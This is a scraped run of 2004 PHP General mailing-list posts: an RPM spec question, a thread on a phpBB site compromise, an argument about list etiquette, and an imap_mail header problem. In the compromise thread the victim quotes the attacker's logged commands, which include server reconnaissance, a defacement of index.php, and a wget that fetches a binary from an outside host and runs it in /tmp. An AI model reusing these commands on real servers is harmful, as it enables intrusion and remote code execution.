[PHP] php 4.4.2 spec
Does anyone have a 4.4.2 spec file that works for creating an rpm? Regards -pa -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] PHP Exploit via phpBB?
John, can you maybe post the IP addresses of where does attacks came from or any other related info? Thanks -pa - Original Message - From: John Nichel [EMAIL PROTECTED] To: PHP Mailing Lists php-general@lists.php.net Sent: Wednesday, December 22, 2004 5:46 PM Subject: Re: [PHP] PHP Exploit via phpBB? John Holmes wrote: From: John Nichel [EMAIL PROTECTED] I'm currently going thru logs from previous days to see if I was getting this 'attack' before upgrading to php v4.3.10 That's why I'm wanted to post this here...just in case it isn't phpBB problem. Many people were trying to tie the vulnerabilities with PHP 4.3.9 to this attack the vulnerabilities in phpBB, but from what I read they were unrelated. Are you on a shared server at all? It may be possible that someone else got attacked and took everyone with them... Yeah, I had been reading about that, but this didn't happen until after I upgraded to 4.3.10. I had upgraded to phpBB 2.0.11, about two weeks ago. That was confusing the hell out of me...here I was using the most recent versions of both phpBB and PHP 4.x, and it still happened...not to mention it happening about 1.5 hours after upgrading php. We're on a dedicated box, and my Rush site is the only one running phpBB, and after digging for the rest of today, I found that it was definitely the fault of phpBB. This post was pointed out to me by a list member... http://www.phpbb.com/phpBB/viewtopic.php?f=14t=240513 So I made that change too, even though I *thought* it was changed in v2.0.11. Course, I probably screwed something up when patching the files. ;) I disabled the system() function too, just in case. These are all the system calls it made... echo ___INICIO___;uname -a;echo ___FIM___; echo ___INICIO___;cat /proc/cpuinfo;echo ___FIM___; echo ___INICIO___;cat /usr/local/apache/conf/httpd.conf;echo ___FIM___; echo ___INICIO___;cat /usr/local/apache/;ls;echo ___FIM___; echo ___INICIO___;echo hh hac.hrml;ls;echo ___FIM___; echo ___INICIO___;echo H4ck3rSBR ownz your by xdr0p455 index.php;echo ___FIM___; echo ___INICIO___;pwd;echo ___FIM___; echo ___INICIO___;pwd;echo ___FIM___; echo ___INICIO___;pwd;echo ___FIM___; echo ___INICIO___;mv -f index.php /webserver/vhosts/by-tor.com/docs/index.php;echo ___FIM___; echo ___INICIO___;cd /tmp;wget http://www.intranorth.com.br/xpl/r0nin;chmod 777 r0nin;./r0nin;echo ___FIM___; echo ___INICIO___;pwd;echo ___FIM___; echo ___INICIO___;id;echo ___FIM___; I'm still trying to figure out how it found all the rest of my vhosts on that box. I see it did a cat /usr/local/apache/conf/httpd.conf to try and read my Apache config file, but mine doesn't live there. It also downloaded a file from a Brazilian website, and executed it in the /tmp directory...I deleted all of those, but saved one to 'play' with later. With any luck, someone else will read thru this, and maybe they'll be luckier than I. -- By-Tor.com ...it's all about the Rush http://www.by-tor.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- This message has been scanned for viruses and dangerous content by MailScanner, and is believed to be clean. -- This message has been scanned for viruses and dangerous content by MailScanner, and is believed to be clean. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] can I compile php source
Bruce, that is the typical answer when someone has a God complex and feels is his duty to teach everyone to be like him... Don't worry just feel sorry for him. QT, take a look at these links http://www.zend.com/store/products/zend-safeguard-suite.php http://www.sourceguardian.com/ just some of the compilers out there. -pa - Original Message - From: John Nichel [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Monday, December 20, 2004 10:53 PM Subject: Re: [PHP] can I compile php source Bruce Douglas wrote: and this response was helpful to the guy who asked the original question, how i mean, aside from showing that you know how to do a link, what did you show peace... Maybe you should read the link, then _maybe_ you'll understand. Would you feel better if I posted links to the archives and/or to Google to where numerous answers could be found to this question? Or maybe the OP could have just gone to the link I posted and seen those two suggestions in the 'Before You Ask' section. Then again, what was I thinking...people think for themselves? How silly of me. -Original Message- From: John Nichel [EMAIL PROTECTED] Sent: Dec 20, 2004 4:32 PM To: [EMAIL PROTECTED] Subject: Re: [PHP] can I compile php source QT wrote: hi, is there any way to compile php source to make binary file for protecting source code? best regards Yes. http://www.catb.org/~esr/faqs/smart-questions.html -- By-Tor.com ...it's all about the Rush http://www.by-tor.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- This message has been scanned for viruses and dangerous content by MailScanner, and is believed to be clean. -- This message has been scanned for viruses and dangerous content by MailScanner, and is believed to be clean. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] can I compile php source OT
the delivery is the problem not the thought process. people are trying to find answers not being lectured and reprimanded. Many people are getting into the field and are new and may not have the wisdom or experience other people have. Think about it How many times have you been dealing with a problem for a long time and the answer was right in front of you? - Original Message - From: Jay Blanchard [EMAIL PROTECTED] To: Paul Aviles [EMAIL PROTECTED]; [EMAIL PROTECTED] Sent: Tuesday, December 21, 2004 9:46 AM Subject: RE: [PHP] can I compile php source OT [snip] Bruce, that is the typical answer when someone has a God complex and feels is his duty to teach everyone to be like him... Don't worry just feel sorry for him. [/snip] So, if I teach everyone to be like me, which includes the following traits; a. I RTFM 2. I STFW and STFA III. I try to ask questions that will garner more than a yes or no answer when I am looking for more than a yes or no answer. that's a bad thing? -- This message has been scanned for viruses and dangerous content by MailScanner, and is believed to be clean. -- This message has been scanned for viruses and dangerous content by MailScanner, and is believed to be clean. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] can I compile php source
no sympathy, reality. So, if someone asks how to past the max_upload size limit will you send them to google or maybe point them to your web site how-to? hmmm. be kind, is free, and people will respect you more. - Original Message - From: Raditha Dissanayake [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Sent: Tuesday, December 21, 2004 9:32 AM Subject: Re: [PHP] can I compile php source Paul Aviles wrote: Bruce, that is the typical answer when someone has a God complex and feels is his duty to teach everyone to be like him... Don't worry just feel sorry for him. Your sympathy is misplaced. -- Raditha Dissanayake. -- http://www.radinks.com/print/card-designer/ | Card Designer Applet http://www.radinks.com/upload/ | Drag and Drop Upload -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- This message has been scanned for viruses and dangerous content by MailScanner, and is believed to be clean. -- This message has been scanned for viruses and dangerous content by MailScanner, and is believed to be clean. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] can I compile php source
some people will never get it. - Original Message - From: Jay Blanchard [EMAIL PROTECTED] To: Paul Aviles [EMAIL PROTECTED]; [EMAIL PROTECTED] Sent: Tuesday, December 21, 2004 10:41 AM Subject: RE: [PHP] can I compile php source [snip] no sympathy, reality. So, if someone asks how to past the max_upload size limit will you send them to google or maybe point them to your web site how-to? hmmm. be kind, is free, and people will respect you more. [/snip] Nope, because the question requires more than a yes or no answer. I would most likely say something like... RTFM... http://us2.php.net/manual/en/features.file-upload.php I am not on this list to earn respect. I am here to learn and where possible, teach. And if you want people to be more politically correct so no one gets insulted or gets their feelings hurt you have come to the wrong place. -- This message has been scanned for viruses and dangerous content by MailScanner, and is believed to be clean. -- This message has been scanned for viruses and dangerous content by MailScanner, and is believed to be clean. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] can I compile php source
Guys, this is trivial. It takes the same effort to provide the answer to whoever this guy was, than to lecture him on how to think. this question has been answered before, use google and do a search for and follow this link before posting as it may help you in the future I am not trying to police anything and I am not for anyone to imitate or follow as example, but I think there are better ways to help. No need to reply, I am not trying to pick a fight nor insult anyone. - Original Message - From: John Nichel [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Tuesday, December 21, 2004 11:39 AM Subject: Re: [PHP] can I compile php source Paul Aviles wrote: some people will never get it. Yeah, I said I wasn't going to reply to this thread, but since you're not going to let it die... You said that I have a 'God' complex, yet you sit here and try to impose your political correctness on us; sitting up there on your high and mighty cloud, telling us how we're doing it wrong. And when long time, respected posters on this list don't agree with you, you fling your nose in the air, and claim that 'some people will never get it', in your holiest of holier than thou voices. WTF makes you think that *you* 'get it'? Don't like the way things work around here? Hit the unsubscribe button, but please stop crying about how wrong we are. Welcome to /dev/null -- John C. Nichel ÜberGeek KegWorks.com 716.856.9675 [EMAIL PROTECTED] -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- This message has been scanned for viruses and dangerous content by MailScanner, and is believed to be clean. -- This message has been scanned for viruses and dangerous content by MailScanner, and is believed to be clean. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] imap_mail problems
Hello, I am having problems with this code below. The system is a FC1 server and it is supposed to send an email collecting some information of a computer. The problem I am having is with the and characters. When the $header variable is created, it does not work if you add the and characters. For some reason makes the whole string like null. Has anyone seen this behaviour? If I try manually to send an email it does work and php does have imap support on it. Thanks -pa snip $header = From: $fullNameField admin@ . trim(`/bin/hostname --fqdn`) . ; $registrationAddress = [EMAIL PROTECTED]; $subject = Registration ($productName); $message = Full name: $fullNameField Title: $titleField Company: $companyField ; // send email imap_mail($registrationAddress, $subject, $message, $header); snip -- This message has been scanned for viruses and dangerous content by MailScanner, and is believed to be clean. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
